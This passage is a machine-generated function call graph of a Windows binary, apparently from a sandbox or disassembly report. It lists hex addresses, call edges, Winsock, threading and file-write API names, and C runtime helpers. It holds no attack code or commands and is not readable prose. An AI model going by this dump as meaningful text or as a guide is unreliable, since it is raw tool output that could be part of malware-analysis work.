2bd0af0 Mailbox 68 API calls 20731->20733 20732->20731 20734 2bd0af0 Mailbox 68 API calls 20732->20734 20735 2bc2b1b 20733->20735 20734->20731 20736 2bd0af0 Mailbox 68 API calls 20735->20736 20738 2bc2b38 20735->20738 20736->20738 20743 2bc2b87 20738->20743 20800 2bc3027 20738->20800 20742 2bd0af0 Mailbox 68 API calls 20742->20743 20743->19901 20745 2bc3548 __EH_prolog 20744->20745 20746 2bc3576 20745->20746 20747 2bc3557 20745->20747 20766 2bc2edd WSASetLastError WSASocketA 20746->20766 20748 2bc1996 68 API calls 20747->20748 20763 2bc355f 20748->20763 20751 2bc35ad CreateIoCompletionPort 20752 2bc35db 20751->20752 20753 2bc35c5 GetLastError 20751->20753 20755 2bd0af0 Mailbox 68 API calls 20752->20755 20754 2bd0af0 Mailbox 68 API calls 20753->20754 20756 2bc35d2 20754->20756 20755->20756 20757 2bc35ef 20756->20757 20758 2bc3626 20756->20758 20759 2bd0af0 Mailbox 68 API calls 20757->20759 20762 2bcdec9 60 API calls 20758->20762 20760 2bc3608 20759->20760 20774 2bc29ee 20760->20774 20764 2bc3659 20762->20764 20763->19898 20765 2bd0af0 Mailbox 68 API calls 20764->20765 20765->20763 20767 2bd0af0 Mailbox 68 API calls 20766->20767 20768 2bc2f0a WSAGetLastError 20767->20768 20769 2bc2f41 20768->20769 20770 2bc2f21 20768->20770 20769->20751 20769->20763 20771 2bc2f3c 20770->20771 20772 2bc2f27 setsockopt 20770->20772 20773 2bd0af0 Mailbox 68 API calls 20771->20773 20772->20771 20773->20769 20775 2bc2a0c 20774->20775 20791 2bc2aad 20774->20791 20776 2bc2a39 WSASetLastError closesocket 20775->20776 20781 2bd0af0 Mailbox 68 API calls 20775->20781 20778 2bca4df 69 API calls 20776->20778 20777 2bd0af0 Mailbox 68 API calls 20780 2bc2ab8 20777->20780 20779 2bc2a51 20778->20779 20783 2bd0af0 Mailbox 68 API calls 20779->20783 20779->20791 20780->20763 20782 2bc2a21 20781->20782 20792 2bc2f50 20782->20792 20785 2bc2a5c 20783->20785 20787 2bc2a7b ioctlsocket WSASetLastError closesocket 20785->20787 20788 2bd0af0 Mailbox 68 API calls 20785->20788 20790 2bca4df 69 API calls 20787->20790 20789 2bc2a6e 20788->20789 20789->20787 20789->20791 20790->20791 20791->20777 20791->20780 20793 2bc2f5b 20792->20793 20794 2bc2f70 WSASetLastError setsockopt 20792->20794 20795 2bd0af0 Mailbox 68 API calls 20793->20795 20796 2bca4df 69 API calls 20794->20796 20797 2bc2a36 20795->20797 20798 2bc2f9e 20796->20798 20797->20776 20798->20797 20799 2bd0af0 Mailbox 68 API calls 20798->20799 20799->20797 20801 2bc304d WSASetLastError select 20800->20801 20802 2bc303b 20800->20802 20804 2bca4df 69 API calls 20801->20804 20803 2bd0af0 Mailbox 68 API calls 20802->20803 20807 2bc2b59 20803->20807 20805 2bc3095 20804->20805 20806 2bd0af0 Mailbox 68 API calls 20805->20806 20805->20807 20806->20807 20807->20743 20808 2bc2fb4 20807->20808 20809 2bc2fd5 WSASetLastError getsockopt 20808->20809 20810 2bc2fc0 20808->20810 20812 2bca4df 69 API calls 20809->20812 20811 2bd0af0 Mailbox 68 API calls 20810->20811 20815 2bc2b7a 20811->20815 20813 2bc300f 20812->20813 20814 2bd0af0 Mailbox 68 API calls 20813->20814 20813->20815 20814->20815 20815->20742 20815->20743 20823 2be53d0 20816->20823 20818 2bc32b5 RtlEnterCriticalSection 20819 2bd0af0 Mailbox 68 API calls 20818->20819 20820 2bc32d6 20819->20820 20824 2bc3307 20820->20824 20823->20818 20825 2bc3311 __EH_prolog 20824->20825 20827 2bc3350 20825->20827 20836 2bc7e58 20825->20836 20840 2bc239d 20827->20840 20830 2bc3390 20846 2bc7e01 20830->20846 20831 2bd0af0 Mailbox 68 API calls 20833 2bc337c 20831->20833 20835 2bc2d39 71 API calls 20833->20835 20835->20830 20839 2bc7e66 20836->20839 20837 2bc7edc 20837->20825 20839->20837 20850 2bc89bd 20839->20850 20841 2bc23ab 20840->20841 20842 2bc2417 20841->20842 20843 2bc23c1 PostQueuedCompletionStatus 20841->20843 20845 2bc23f8 InterlockedExchange RtlLeaveCriticalSection 20841->20845 20842->20830 20842->20831 20843->20841 20844 2bc23da RtlEnterCriticalSection 20843->20844 20844->20841 20845->20841 20847 2bc7e06 20846->20847 20848 2bc32ee RtlLeaveCriticalSection 20847->20848 20866 2bc1e7f 20847->20866 20848->19917 20851 2bc89e7 20850->20851 20852 2bc7e01 68 API calls 20851->20852 20854 2bc8a2d 20852->20854 20853 2bc8a54 20853->20837 20854->20853 20856 2bca24a 20854->20856 20857 2bca254 20856->20857 20858 2bca264 20856->20858 20857->20858 20861 2bcfb08 20857->20861 20858->20853 20862 2bd24b3 std::exception::exception 59 API calls 20861->20862 20863 2bcfb20 20862->20863 20864 2bd453a __CxxThrowException@8 RaiseException 20863->20864 20865 2bcfb35 20864->20865 20867 2bd0af0 Mailbox 68 API calls 20866->20867 20868 2bc1e90 20867->20868 20868->20847 20870 2bd225b _LocaleUpdate::_LocaleUpdate 59 API calls 20869->20870 20871 2bd2377 20870->20871 20872 2bd2385 20871->20872 20878 2bd239c 20871->20878 20873 2bd5e3b __chsize_nolock 59 API calls 20872->20873 20874 2bd238a 20873->20874 20875 2bd4ed5 __write_nolock 9 API calls 20874->20875 20876 2bd2395 ___ascii_stricmp 20875->20876 20876->19926 20877 2bd595a 66 API calls __tolower_l 20877->20878 20878->20876 20878->20877 20880 2bd286b 20879->20880 20881 2bd5e3b __chsize_nolock 59 API calls 20880->20881 20884 2bd287b _strlen 20880->20884 20882 2bd2870 20881->20882 20883 2bd4ed5 __write_nolock 9 API calls 20882->20883 20883->20884 20884->19934 20886 2bcdfe0 __EH_prolog 20885->20886 20887 2bd3b2c _Allocate 60 API calls 20886->20887 20888 2bcdff7 20887->20888 20888->19953 20890 2bca6e8 GetProcessHeap HeapFree 20889->20890 20890->19959 20892 2bd225b _LocaleUpdate::_LocaleUpdate 59 API calls 20891->20892 20893 2bd60a5 20892->20893 20894 2bd5e3b __chsize_nolock 59 API calls 20893->20894 20895 2bd60aa 20894->20895 20896 2bd6b7b 20895->20896 20902 2bd60ca __output_l __aulldvrm _strlen 20895->20902 20936 2bd9e11 20895->20936 20897 2bd5e3b __chsize_nolock 59 API calls 20896->20897 20899 2bd6b80 20897->20899 20900 2bd4ed5 __write_nolock 9 API calls 20899->20900 20901 2bd6b55 20900->20901 20903 2bd452b __except_handler4 6 API calls 20901->20903 20902->20896 20902->20901 20906 2bd6bb0 79 API calls __output_l 20902->20906 20907 2bd6733 RtlDecodePointer 20902->20907 20908 2bd6bf8 79 API calls _write_multi_char 20902->20908 20909 2bd2f54 _free 59 API calls 20902->20909 20910 2bd6c24 79 API calls _write_string 20902->20910 20911 2bdfac4 61 API calls __cftof 20902->20911 20912 2bd8a94 __malloc_crt 59 API calls 20902->20912 20913 2bd6796 RtlDecodePointer 20902->20913 20914 2bd67bb RtlDecodePointer 20902->20914 20943 2bddcee 20902->20943 20904 2bd2456 20903->20904 20904->19971 20915 2bd5ee1 20904->20915 20906->20902 20907->20902 20908->20902 20909->20902 20910->20902 20911->20902 20912->20902 20913->20902 20914->20902 20916 2bd9e11 __fflush_nolock 59 API calls 20915->20916 20917 2bd5eef 20916->20917 20918 2bd5efa 20917->20918 20919 2bd5f11 20917->20919 20920 2bd5e3b __chsize_nolock 59 API calls 20918->20920 20921 2bd5f16 20919->20921 20930 2bd5f23 __flsbuf 20919->20930 20929 2bd5eff 20920->20929 20922 2bd5e3b __chsize_nolock 59 API calls 20921->20922 20922->20929 20923 2bd5f7d 20924 2bd5f87 20923->20924 20925 2bd6001 20923->20925 20926 2bd5fa1 20924->20926 20932 2bd5fb8 20924->20932 20927 2bd9e35 __write 79 API calls 20925->20927 20958 2bd9e35 20926->20958 20927->20929 20929->19971 20930->20923 20930->20929 20933 2bd5f72 20930->20933 20946 2bdf782 20930->20946 20932->20929 20986 2bdf7d6 20932->20986 20933->20923 20955 2bdf945 20933->20955 20937 2bd9e1b 20936->20937 20938 2bd9e30 20936->20938 20939 2bd5e3b __chsize_nolock 59 API calls 20937->20939 20938->20902 20940 2bd9e20 20939->20940 20941 2bd4ed5 __write_nolock 9 API calls 20940->20941 20942 2bd9e2b 20941->20942 20942->20902 20944 2bd225b _LocaleUpdate::_LocaleUpdate 59 API calls 20943->20944 20945 2bddcff 20944->20945 20945->20902 20947 2bdf78d 20946->20947 20948 2bdf79a 20946->20948 20949 2bd5e3b __chsize_nolock 59 API calls 20947->20949 20950 2bdf7a6 20948->20950 20951 2bd5e3b __chsize_nolock 59 API calls 20948->20951 20952 2bdf792 20949->20952 20950->20933 20953 2bdf7c7 20951->20953 20952->20933 20954 2bd4ed5 __write_nolock 9 API calls 20953->20954 20954->20952 20956 2bd8a94 __malloc_crt 59 API calls 20955->20956 20957 2bdf95a 20956->20957 20957->20923 20959 2bd9e41 __mtinitlocknum 20958->20959 20960 2bd9e4e 20959->20960 20961 2bd9e65 20959->20961 20962 2bd5e07 __chsize_nolock 59 API calls 20960->20962 20963 2bd9f04 20961->20963 20965 2bd9e79 20961->20965 20964 2bd9e53 20962->20964 20966 2bd5e07 __chsize_nolock 59 API calls 20963->20966 20967 2bd5e3b __chsize_nolock 59 API calls 20964->20967 20968 2bd9e97 20965->20968 20969 2bd9ea1 20965->20969 20974 2bd9e9c 20966->20974 20983 2bd9e5a __mtinitlocknum 20967->20983 20971 2bd5e07 __chsize_nolock 59 API calls 20968->20971 21011 2be0c67 20969->21011 20971->20974 20972 2bd5e3b __chsize_nolock 59 API calls 20975 2bd9f10 20972->20975 20973 2bd9ea7 20976 2bd9ecd 20973->20976 20977 2bd9eba 20973->20977 20974->20972 20978 2bd4ed5 __write_nolock 9 API calls 20975->20978 20980 2bd5e3b __chsize_nolock 59 API calls 20976->20980 21020 2bd9f24 20977->21020 20978->20983 20982 2bd9ed2 20980->20982 20981 2bd9ec6 21079 2bd9efc 20981->21079 20984 2bd5e07 __chsize_nolock 59 API calls 20982->20984 20983->20929 20984->20981 20987 2bdf7e2 __mtinitlocknum 20986->20987 20988 2bdf80b 20987->20988 20989 2bdf7f3 20987->20989 20991 2bdf8b0 20988->20991 20995 2bdf840 20988->20995 20990 2bd5e07 __chsize_nolock 59 API calls 20989->20990 20993 2bdf7f8 20990->20993 20992 2bd5e07 __chsize_nolock 59 API calls 20991->20992 20994 2bdf8b5 20992->20994 20996 2bd5e3b __chsize_nolock 59 API calls 20993->20996 20997 2bd5e3b __chsize_nolock 59 API calls 20994->20997 20998 2be0c67 ___lock_fhandle 60 API calls 20995->20998 21005 2bdf800 __mtinitlocknum 20996->21005 20999 2bdf8bd 20997->20999 21000 2bdf846 20998->21000 21001 2bd4ed5 __write_nolock 9 API calls 20999->21001 21002 2bdf85c 21000->21002 21003 2bdf874 21000->21003 21001->21005 21004 2bdf8d2 __lseeki64_nolock 61 API calls 21002->21004 21006 2bd5e3b __chsize_nolock 59 API calls 21003->21006 21007 2bdf86b 21004->21007 21005->20929 21008 2bdf879 21006->21008 21112 2bdf8a8 21007->21112 21009 2bd5e07 __chsize_nolock 59 API calls 21008->21009 21009->21007 21012 2be0c73 __mtinitlocknum 21011->21012 21013 2be0cc2 RtlEnterCriticalSection 21012->21013 21014 2bd88cd __lock 59 API calls 21012->21014 21015 2be0ce8 __mtinitlocknum 21013->21015 21016 2be0c98 21014->21016 21015->20973 21017 2be0cb0 21016->21017 21019 2bd91ec __mtinitlocknum InitializeCriticalSectionAndSpinCount 21016->21019 21082 2be0cec 21017->21082 21019->21017 21021 2bd9f31 __write_nolock 21020->21021 21022 2bd9f8f 21021->21022 21023 2bd9f70 21021->21023 21055 2bd9f65 21021->21055 21028 2bd9fe7 21022->21028 21029 2bd9fcb 21022->21029 21024 2bd5e07 __chsize_nolock 59 API calls 21023->21024 21027 2bd9f75 21024->21027 21025 2bd452b __except_handler4 6 API calls 21026 2bda785 21025->21026 21026->20981 21030 2bd5e3b __chsize_nolock 59 API calls 21027->21030 21031 2bda000 21028->21031 21086 2bdf8d2 21028->21086 21032 2bd5e07 __chsize_nolock 59 API calls 21029->21032 21033 2bd9f7c 21030->21033 21035 2bdf782 __write_nolock 59 API calls 21031->21035 21036 2bd9fd0 21032->21036 21037 2bd4ed5 __write_nolock 9 API calls 21033->21037 21038 2bda00e 21035->21038 21039 2bd5e3b __chsize_nolock 59 API calls 21036->21039 21037->21055 21040 2bda367 21038->21040 21045 2bd5c3a FindHandler 59 API calls 21038->21045 21041 2bd9fd7 21039->21041 21043 2bda6fa WriteFile 21040->21043 21044 2bda385 21040->21044 21042 2bd4ed5 __write_nolock 9 API calls 21041->21042 21042->21055 21046 2bda35a GetLastError 21043->21046 21057 2bda327 21043->21057 21047 2bda4a9 21044->21047 21054 2bda39b 21044->21054 21050 2bda03a GetConsoleMode 21045->21050 21046->21057 21048 2bda59e 21047->21048 21049 2bda4b4 21047->21049 21051 2bda733 21048->21051 21048->21057 21061 2bda613 WideCharToMultiByte 21048->21061 21068 2bda662 WriteFile 21048->21068 21049->21051 21049->21057 21062 2bda519 WriteFile 21049->21062 21050->21040 21052 2bda079 21050->21052 21051->21055 21056 2bd5e3b __chsize_nolock 59 API calls 21051->21056 21052->21040 21058 2bda089 GetConsoleCP 21052->21058 21053 2bda40a WriteFile 21053->21046 21053->21054 21054->21051 21054->21053 21054->21057 21055->21025 21059 2bda761 21056->21059 21057->21051 21057->21055 21060 2bda487 21057->21060 21058->21051 21074 2bda0b8 21058->21074 21063 2bd5e07 __chsize_nolock 59 API calls 21059->21063 21064 2bda72a 21060->21064 21065 2bda492 21060->21065 21061->21046 21061->21048 21062->21046 21062->21049 21063->21055 21066 2bd5e1a __dosmaperr 59 API calls 21064->21066 21067 2bd5e3b __chsize_nolock 59 API calls 21065->21067 21066->21055 21069 2bda497 21067->21069 21068->21048 21071 2bda6b5 GetLastError 21068->21071 21072 2bd5e07 __chsize_nolock 59 API calls 21069->21072 21071->21048 21072->21055 21073 2be1033 WriteConsoleW CreateFileW __putwch_nolock 21073->21074 21074->21046 21074->21057 21074->21073 21075 2bda1a1 WideCharToMultiByte 21074->21075 21076 2bdffea 61 API calls __write_nolock 21074->21076 21078 2bda236 WriteFile 21074->21078 21095 2bddd28 21074->21095 21075->21057 21077 2bda1dc WriteFile 21075->21077 21076->21074 21077->21046 21077->21074 21078->21046 21078->21074 21111 2be100d RtlLeaveCriticalSection 21079->21111 21081 2bd9f02 21081->20983 21085 2bd8a37 RtlLeaveCriticalSection 21082->21085 21084 2be0cf3 21084->21013 21085->21084 21098 2be0f24 21086->21098 21088 2bdf8e2 21089 2bdf8fb SetFilePointerEx 21088->21089 21090 2bdf8ea 21088->21090 21092 2bdf913 GetLastError 21089->21092 21093 2bdf8ef 21089->21093 21091 2bd5e3b __chsize_nolock 59 API calls 21090->21091 21091->21093 21094 2bd5e1a __dosmaperr 59 API calls 21092->21094 21093->21031 21094->21093 21096 2bddcee __isleadbyte_l 59 API calls 21095->21096 21097 2bddd35 21096->21097 21097->21074 21099 2be0f2f 21098->21099 21100 2be0f44 21098->21100 21101 2bd5e07 __chsize_nolock 59 API calls 21099->21101 21103 2bd5e07 __chsize_nolock 59 API calls 21100->21103 21105 2be0f69 21100->21105 21102 2be0f34 21101->21102 21104 2bd5e3b __chsize_nolock 59 API calls 21102->21104 21106 2be0f73 21103->21106 21108 2be0f3c 21104->21108 21105->21088 21107 2bd5e3b __chsize_nolock 59 API calls 21106->21107 21109 2be0f7b 21107->21109 21108->21088 21110 2bd4ed5 __write_nolock 9 API calls 21109->21110 21110->21108 21111->21081 21115 2be100d RtlLeaveCriticalSection 21112->21115 21114 2bdf8ae 21114->21005 21115->21114 21116->19975 21118 2bce310 __EH_prolog 21117->21118 21119 2bd3b2c _Allocate 60 API calls 21118->21119 21120 2bce319 21119->21120 21121 2bc1bfa RtlEnterCriticalSection 21120->21121 21123 2bce527 21120->21123 21121->19980 21124 2bce531 __EH_prolog 21123->21124 21127 2bc26db RtlEnterCriticalSection 21124->21127 21126 2bce587 21126->21121 21128 2bc277e 21127->21128 21129 2bc2728 CreateWaitableTimerA 21127->21129 21132 2bc27d5 RtlLeaveCriticalSection 21128->21132 21134 2bd3b2c _Allocate 60 API calls 21128->21134 21130 2bc2738 GetLastError 21129->21130 21131 2bc275b SetWaitableTimer 21129->21131 21133 2bd0af0 Mailbox 68 API calls 21130->21133 21131->21128 21132->21126 21135 2bc2745 21133->21135 21138 2bc278a 21134->21138 21136 2bc1712 60 API calls 21135->21136 21136->21131 21137 2bc27c8 21171 2bc7dd9 21137->21171 21138->21137 21139 2bd3b2c _Allocate 60 API calls 21138->21139 21141 2bc27a9 21139->21141 21143 2bc1cf8 CreateEventA 21141->21143 21144 2bc1d52 CreateEventA 21143->21144 21145 2bc1d23 GetLastError 21143->21145 21146 2bc1d96 21144->21146 21147 2bc1d6b GetLastError 21144->21147 21149 2bc1d33 21145->21149 21148 2bd3399 __beginthreadex 275 API calls 21146->21148 21150 2bc1d7b 21147->21150 21151 2bc1db6 21148->21151 21152 2bd0af0 Mailbox 68 API calls 21149->21152 21153 2bd0af0 Mailbox 68 API calls 21150->21153 21154 2bc1e0d 21151->21154 21155 2bc1dc6 GetLastError 21151->21155 21156 2bc1d3c 21152->21156 21157 2bc1d84 21153->21157 21158 2bc1e1d 21154->21158 21159 2bc1e11 WaitForSingleObject CloseHandle 21154->21159 21162 2bc1dd8 21155->21162 21160 2bc1712 60 API calls 21156->21160 21161 2bc1712 60 API calls 21157->21161 21158->21137 21159->21158 21163 2bc1d4e 21160->21163 21161->21146 21164 2bc1ddc CloseHandle 21162->21164 21165 2bc1ddf 21162->21165 21163->21144 21164->21165 21166 2bc1dee 21165->21166 21167 2bc1de9 CloseHandle 21165->21167 21168 2bd0af0 Mailbox 68 API calls 21166->21168 21167->21166 21169 2bc1dfb 21168->21169 21170 2bc1712 60 API calls 21169->21170 21170->21154 21172 2bc7de6 CloseHandle 21171->21172 21173 2bc7df5 21171->21173 21172->21173 21173->21132 21185 2bc30ae WSASetLastError 21174->21185 21177 2bc3c90 21179 2bc16ae 21177->21179 21178 2bc30ae 71 API calls 21178->21177 21180 2bc16b8 __EH_prolog 21179->21180 21181 2bc1701 21180->21181 21182 2bd24b3 std::exception::exception 59 API calls 21180->21182 21181->19831 21183 2bc16dc 21182->21183 21201 2bca478 21183->21201 21186 2bc30ec WSAStringToAddressA 21185->21186 21187 2bc30ce 21185->21187 21189 2bca4df 69 API calls 21186->21189 21187->21186 21188 2bc30d3 21187->21188 21191 2bd0af0 Mailbox 68 API calls 21188->21191 21190 2bc3114 21189->21190 21192 2bc3154 21190->21192 21197 2bc311e _memcmp 21190->21197 21200 2bc30d8 21191->21200 21193 2bc3135 21192->21193 21198 2bd0af0 Mailbox 68 API calls 21192->21198 21194 2bc3193 21193->21194 21195 2bd0af0 Mailbox 68 API calls 21193->21195 21199 2bd0af0 Mailbox 68 API calls 21194->21199 21194->21200 21195->21194 21196 2bd0af0 Mailbox 68 API calls 21196->21193 21197->21193 21197->21196 21198->21193 21199->21200 21200->21177 21200->21178 21202 2bca482 __EH_prolog 21201->21202 21209 2bcc9dd 21202->21209 21206 2bca4a3 21207 2bd453a __CxxThrowException@8 RaiseException 21206->21207 21208 2bca4b1 21207->21208 21210 2bcb204 std::bad_exception::bad_exception 60 API calls 21209->21210 21211 2bca495 21210->21211 21212 2bcca19 21211->21212 21213 2bcca23 __EH_prolog 21212->21213 21216 2bcb1b3 21213->21216 21215 2bcca52 Mailbox 21215->21206 21217 2bcb1bd __EH_prolog 21216->21217 21218 2bcb204 std::bad_exception::bad_exception 60 API calls 21217->21218 21219 2bcb1ce Mailbox 21218->21219 21219->21215 21221 2bc3c20 __EH_prolog 21220->21221 21222 2bc3c41 21221->21222 21223 2bd2497 std::bad_exception::bad_exception 59 API calls 21221->21223 21222->19995 21224 2bc3c35 21223->21224 21225 2bca62d 60 API calls 21224->21225 21225->21222 21227 2bc3755 InterlockedCompareExchange 21226->21227 21228 2bc3770 21226->21228 21227->21228 21229 2bc3765 21227->21229 21230 2bd0af0 Mailbox 68 API calls 21228->21230 21231 2bc32ab 78 API calls 21229->21231 21232 2bc3779 21230->21232 21231->21228 21233 2bc29ee 76 API calls 21232->21233 21234 2bc378e 21233->21234 21234->19999 21264 2bd368d 21235->21264 21237 2bc53c8 21237->20012 21238 2bd38e6 21237->21238 21239 2bd38f2 __mtinitlocknum 21238->21239 21240 2bd3928 21239->21240 21241 2bd3910 21239->21241 21244 2bd3920 __mtinitlocknum 21239->21244 21406 2bd97d2 21240->21406 21243 2bd5e3b __chsize_nolock 59 API calls 21241->21243 21246 2bd3915 21243->21246 21244->20010 21248 2bd4ed5 __write_nolock 9 API calls 21246->21248 21248->21244 21252 2bd3a70 __mtinitlocknum 21251->21252 21253 2bd3a9c 21252->21253 21254 2bd3a84 21252->21254 21257 2bd97d2 __lock_file 60 API calls 21253->21257 21260 2bd3a94 __mtinitlocknum 21253->21260 21255 2bd5e3b __chsize_nolock 59 API calls 21254->21255 21256 2bd3a89 21255->21256 21258 2bd4ed5 __write_nolock 9 API calls 21256->21258 21259 2bd3aae 21257->21259 21258->21260 21433 2bd39f8 21259->21433 21260->20012 21265 2bd3699 __mtinitlocknum 21264->21265 21266 2bd36ab 21265->21266 21269 2bd36d8 21265->21269 21267 2bd5e3b __chsize_nolock 59 API calls 21266->21267 21268 2bd36b0 21267->21268 21270 2bd4ed5 __write_nolock 9 API calls 21268->21270 21283 2bd98a8 21269->21283 21280 2bd36bb __mtinitlocknum @_EH4_CallFilterFunc@8 21270->21280 21272 2bd36dd 21273 2bd36e6 21272->21273 21274 2bd36f3 21272->21274 21275 2bd5e3b __chsize_nolock 59 API calls 21273->21275 21276 2bd371c 21274->21276 21277 2bd36fc 21274->21277 21275->21280 21298 2bd99c7 21276->21298 21278 2bd5e3b __chsize_nolock 59 API calls 21277->21278 21278->21280 21280->21237 21284 2bd98b4 __mtinitlocknum 21283->21284 21285 2bd88cd __lock 59 API calls 21284->21285 21296 2bd98c2 21285->21296 21286 2bd9936 21328 2bd99be 21286->21328 21287 2bd993d 21289 2bd8a94 __malloc_crt 59 API calls 21287->21289 21291 2bd9944 21289->21291 21290 2bd99b3 __mtinitlocknum 21290->21272 21291->21286 21292 2bd91ec __mtinitlocknum InitializeCriticalSectionAndSpinCount 21291->21292 21295 2bd996a RtlEnterCriticalSection 21292->21295 21293 2bd8955 __mtinitlocknum 59 API calls 21293->21296 21295->21286 21296->21286 21296->21287 21296->21293 21318 2bd9811 21296->21318 21323 2bd987b 21296->21323 21300 2bd99e4 21298->21300 21299 2bd99f8 21301 2bd5e3b __chsize_nolock 59 API calls 21299->21301 21300->21299 21314 2bd9b9f 21300->21314 21333 2be082e 21300->21333 21302 2bd99fd 21301->21302 21303 2bd4ed5 __write_nolock 9 API calls 21302->21303 21306 2bd3727 21303->21306 21304 2bd9bfb 21339 2be0810 21304->21339 21315 2bd3749 21306->21315 21311 2be095d __openfile 59 API calls 21312 2bd9bb7 21311->21312 21313 2be095d __openfile 59 API calls 21312->21313 21312->21314 21313->21314 21314->21299 21314->21304 21399 2bd9841 21315->21399 21317 2bd374f 21317->21280 21319 2bd981c 21318->21319 21320 2bd9832 RtlEnterCriticalSection 21318->21320 21321 2bd88cd __lock 59 API calls 21319->21321 21320->21296 21322 2bd9825 21321->21322 21322->21296 21324 2bd989c RtlLeaveCriticalSection 21323->21324 21325 2bd9889 21323->21325 21324->21296 21331 2bd8a37 RtlLeaveCriticalSection 21325->21331 21327 2bd9899 21327->21296 21332 2bd8a37 RtlLeaveCriticalSection 21328->21332 21330 2bd99c5 21330->21290 21331->21327 21332->21330 21342 2be0846 21333->21342 21335 2bd9b65 21335->21299 21336 2be095d 21335->21336 21350 2be0975 21336->21350 21338 2bd9b98 21338->21311 21338->21314 21357 2be06f9 21339->21357 21341 2be0829 21341->21306 21343 2be085b 21342->21343 21348 2be0854 21342->21348 21344 2bd225b _LocaleUpdate::_LocaleUpdate 59 API calls 21343->21344 21345 2be0868 21344->21345 21346 2bd5e3b __chsize_nolock 59 API calls 21345->21346 21345->21348 21347 2be089b 21346->21347 21349 2bd4ed5 __write_nolock 9 API calls 21347->21349 21348->21335 21349->21348 21351 2bd225b _LocaleUpdate::_LocaleUpdate 59 API calls 21350->21351 21352 2be0988 21351->21352 21353 2bd5e3b __chsize_nolock 59 API calls 21352->21353 21356 2be099d 21352->21356 21354 2be09c9 21353->21354 21355 2bd4ed5 __write_nolock 9 API calls 21354->21355 21355->21356 21356->21338 21358 2be0705 __mtinitlocknum 21357->21358 21359 2be071b 21358->21359 21362 2be0751 21358->21362 21360 2bd5e3b __chsize_nolock 59 API calls 21359->21360 21361 2be0720 21360->21361 21363 2bd4ed5 __write_nolock 9 API calls 21361->21363 21368 2be07c2 21362->21368 21367 2be072a __mtinitlocknum 21363->21367 21367->21341 21377 2bd8216 21368->21377 21370 2be076d 21373 2be0796 21370->21373 21371 2be07d6 21371->21370 21372 2bd2f54 _free 59 API calls 21371->21372 21372->21370 21374 2be079c 21373->21374 21376 2be07c0 21373->21376 21398 2be100d RtlLeaveCriticalSection 21374->21398 21376->21367 21378 2bd8239 21377->21378 21379 2bd8223 21377->21379 21378->21379 21381 2bd8240 ___crtIsPackagedApp 21378->21381 21380 2bd5e3b __chsize_nolock 59 API calls 21379->21380 21382 2bd8228 21380->21382 21384 2bd8249 AreFileApisANSI 21381->21384 21385 2bd8256 MultiByteToWideChar 21381->21385 21383 2bd4ed5 __write_nolock 9 API calls 21382->21383 21391 2bd8232 21383->21391 21384->21385 21386 2bd8253 21384->21386 21387 2bd8281 21385->21387 21388 2bd8270 GetLastError 21385->21388 21386->21385 21390 2bd8a94 __malloc_crt 59 API calls 21387->21390 21389 2bd5e1a __dosmaperr 59 API calls 21388->21389 21389->21391 21392 2bd8289 21390->21392 21391->21371 21392->21391 21393 2bd8290 MultiByteToWideChar 21392->21393 21393->21391 21394 2bd82a6 GetLastError 21393->21394 21395 2bd5e1a __dosmaperr 59 API calls 21394->21395 21396 2bd82b2 21395->21396 21397 2bd2f54 _free 59 API calls 21396->21397 21397->21391 21398->21376 21400 2bd986f RtlLeaveCriticalSection 21399->21400 21401 2bd9850 21399->21401 21400->21317 21401->21400 21402 2bd9857 21401->21402 21405 2bd8a37 RtlLeaveCriticalSection 21402->21405 21404 2bd986c 21404->21317 21405->21404 21407 2bd9804 RtlEnterCriticalSection 21406->21407 21408 2bd97e2 21406->21408 21410 2bd392e 21407->21410 21408->21407 21409 2bd97ea 21408->21409 21411 2bd88cd __lock 59 API calls 21409->21411 21412 2bd378d 21410->21412 21411->21410 21415 2bd379c 21412->21415 21418 2bd37ba 21412->21418 21413 2bd37aa 21414 2bd5e3b __chsize_nolock 59 API calls 21413->21414 21416 2bd37af 21414->21416 21415->21413 21415->21418 21423 2bd37d4 _memmove 21415->21423 21417 2bd4ed5 __write_nolock 9 API calls 21416->21417 21417->21418 21424 2bd3960 21418->21424 21419 2bd5ee1 __flsbuf 79 API calls 21419->21423 21421 2bd9e11 __fflush_nolock 59 API calls 21421->21423 21422 2bd9e35 __write 79 API calls 21422->21423 21423->21418 21423->21419 21423->21421 21423->21422 21427 2bda7cf 21423->21427 21425 2bd9841 __fsopen 2 API calls 21424->21425 21426 2bd3966 21425->21426 21426->21244 21428 2bda7e2 21427->21428 21429 2bda806 21427->21429 21428->21429 21430 2bd9e11 __fflush_nolock 59 API calls 21428->21430 21429->21423 21431 2bda7ff 21430->21431 21432 2bd9e35 __write 79 API calls 21431->21432 21432->21429 21434 2bd3a07 21433->21434 21436 2bd3a1b 21433->21436 21437 2bd5e3b __chsize_nolock 59 API calls 21434->21437 21435 2bd3a17 21449 2bd3ad3 21435->21449 21436->21435 21438 2bda7cf __flush 79 API calls 21436->21438 21439 2bd3a0c 21437->21439 21440 2bd3a27 21438->21440 21441 2bd4ed5 __write_nolock 9 API calls 21439->21441 21452 2bdb27b 21440->21452 21441->21435 21444 2bd9e11 __fflush_nolock 59 API calls 21445 2bd3a35 21444->21445 21456 2bdb106 21445->21456 21447 2bd3a3b 21447->21435 21448 2bd2f54 _free 59 API calls 21447->21448 21448->21435 21450 2bd9841 __fsopen 2 API calls 21449->21450 21451 2bd3ad9 21450->21451 21451->21260 21453 2bd3a2f 21452->21453 21454 2bdb288 21452->21454 21453->21444 21454->21453 21455 2bd2f54 _free 59 API calls 21454->21455 21455->21453 21457 2bdb112 __mtinitlocknum 21456->21457 21458 2bdb11f 21457->21458 21459 2bdb136 21457->21459 21460 2bd5e07 __chsize_nolock 59 API calls 21458->21460 21461 2bdb1c1 21459->21461 21462 2bdb146 21459->21462 21464 2bdb124 21460->21464 21463 2bd5e07 __chsize_nolock 59 API calls 21461->21463 21465 2bdb16e 21462->21465 21466 2bdb164 21462->21466 21467 2bdb169 21463->21467 21468 2bd5e3b __chsize_nolock 59 API calls 21464->21468 21470 2be0c67 ___lock_fhandle 60 API calls 21465->21470 21469 2bd5e07 __chsize_nolock 59 API calls 21466->21469 21472 2bd5e3b __chsize_nolock 59 API calls 21467->21472 21471 2bdb12b __mtinitlocknum 21468->21471 21469->21467 21473 2bdb174 21470->21473 21471->21447 21474 2bdb1cd 21472->21474 21475 2bdb187 21473->21475 21476 2bdb192 21473->21476 21477 2bd4ed5 __write_nolock 9 API calls 21474->21477 21482 2bdb1e1 21475->21482 21479 2bd5e3b __chsize_nolock 59 API calls 21476->21479 21477->21471 21480 2bdb18d 21479->21480 21497 2bdb1b9 21480->21497 21483 2be0f24 __chsize_nolock 59 API calls 21482->21483 21485 